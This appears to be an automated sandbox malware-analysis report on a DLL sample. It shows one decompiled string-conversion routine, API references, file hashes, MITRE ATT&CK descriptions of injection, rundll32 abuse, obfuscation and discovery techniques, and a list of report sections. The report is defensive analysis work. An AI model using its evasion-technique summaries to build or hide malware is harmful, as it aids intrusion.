			E6DE24B79(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
				char* _v8;
				int _v12;
				char _v16;
				char _v24;
				char _v28;
				void* __ebx;
				char _t34;
				int _t35;
				int _t38;
				long _t39;
				char* _t42;
				int _t44;
				int _t47;
				int _t53;
				intOrPtr _t55;
				void* _t56;
				char* _t57;
				char* _t62;
				char* _t63;
				void* _t64;
				int _t65;
				short* _t67;
				short* _t68;
				int _t69;
				intOrPtr* _t70;

				_t64 = __edx;
				_t53 = _a12;
				_t67 = _a4;
				_t68 = 0;
				if(_t67 == 0) {
					L3:
					if(_a8 != _t68) {
						E6DE01F60(_t53,  &_v28, _t64, _a16);
						_t34 = _v24;
						__eflags = _t67;
						if(_t67 == 0) {
							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
								_t69 = _t68 | 0xffffffff;
								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
								__eflags = _t35;
								if(_t35 != 0) {
									L29:
									_t28 = _t35 - 1; // -1
									_t69 = _t28;
									L30:
									__eflags = _v16;
									if(_v16 != 0) {
										_t55 = _v28;
										_t31 = _t55 + 0x350;
										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
										__eflags =  *_t31;
									}
									return _t69;
								}
								 *((intOrPtr*)(E6DE12281())) = 0x2a;
								goto L30;
							}
							_t70 = _a8;
							_t25 = _t70 + 1; // 0x1
							_t56 = _t25;
							do {
								_t38 =  *_t70;
								_t70 = _t70 + 1;
								__eflags = _t38;
							} while (_t38 != 0);
							_t69 = _t70 - _t56;
							goto L30;
						}
						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
							_t69 = _t68 | 0xffffffff;
							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
							__eflags = _t35;
							if(_t35 != 0) {
								goto L29;
							}
							_t39 = GetLastError();
							__eflags = _t39 - 0x7a;
							if(_t39 != 0x7a) {
								L21:
								 *((intOrPtr*)(E6DE12281())) = 0x2a;
								 *_t67 = 0;
								goto L30;
							}
							_t42 = _a8;
							_t57 = _t42;
							_v8 = _t57;
							_t65 = _t53;
							__eflags = _t53;
							if(_t53 == 0) {
								L20:
								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
								__eflags = _t44;
								if(_t44 != 0) {
									_t69 = _t44;
									goto L30;
								}
								goto L21;
							} else {
								goto L15;
							}
							while(1) {
								L15:
								_t45 =  *_t57;
								_v12 = _t65 - 1;
								__eflags =  *_t57;
								if(__eflags == 0) {
									break;
								}
								_t47 = E6DE28CAB(__eflags, _t45 & 0x000000ff,  &_v24);
								_t62 = _v8;
								__eflags = _t47;
								if(_t47 == 0) {
									L18:
									_t65 = _v12;
									_t57 = _t62 + 1;
									_v8 = _t57;
									__eflags = _t65;
									if(_t65 != 0) {
										continue;
									}
									break;
								}
								_t62 = _t62 + 1;
								__eflags =  *_t62;
								if( *_t62 == 0) {
									goto L21;
								}
								goto L18;
							}
							_t42 = _a8;
							goto L20;
						}
						__eflags = _t53;
						if(_t53 == 0) {
							goto L30;
						}
						_t63 = _a8;
						while(1) {
							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
							__eflags =  *(_t68 + _t63);
							if( *(_t68 + _t63) == 0) {
								goto L30;
							}
							_t68 =  &(_t68[0]);
							_t67 =  &(_t67[1]);
							__eflags = _t68 - _t53;
							if(_t68 < _t53) {
								continue;
							}
							goto L30;
						}
						goto L30;
					}
					 *((intOrPtr*)(E6DE12281())) = 0x16;
					return E6DE1215B() | 0xffffffff;
				}
				if(_t53 != 0) {
					 *_t67 = 0;
					goto L3;
				}
				return 0;
			}

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,00000000,00000000,00000000,4B767D5A,4B767D5A,00000000,00000000,00000000,00000000,00000000), ref: 6DE24C0F
GetLastError.KERNEL32 ref: 6DE24C1D
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 6DE24C78

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 035e4c005c87b44f7b02fbb491c349471c144d3d815887ecafa7112123b83920
Instruction ID: 288bda7154555f8af1ffb8620a1bed8bfbe0c094c54c8ad6ccb09de043c99e3e
Opcode Fuzzy Hash: 035e4c005c87b44f7b02fbb491c349471c144d3d815887ecafa7112123b83920
Instruction Fuzzy Hash: F341E574604207EFEB159FA8CC45B7A7BB4EF6A328F31815AE955BB290DF318901C750

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report CJxeLKU314.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

Signature Overview

Compliance:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: loaddll32.exe PID: 2964 Parent PID: 5704

General

Analysis Process: cmd.exe PID: 4036 Parent PID: 2964

General

Analysis Process: rundll32.exe PID: 4676 Parent PID: 2964

General

Analysis Process: rundll32.exe PID: 4672 Parent PID: 4036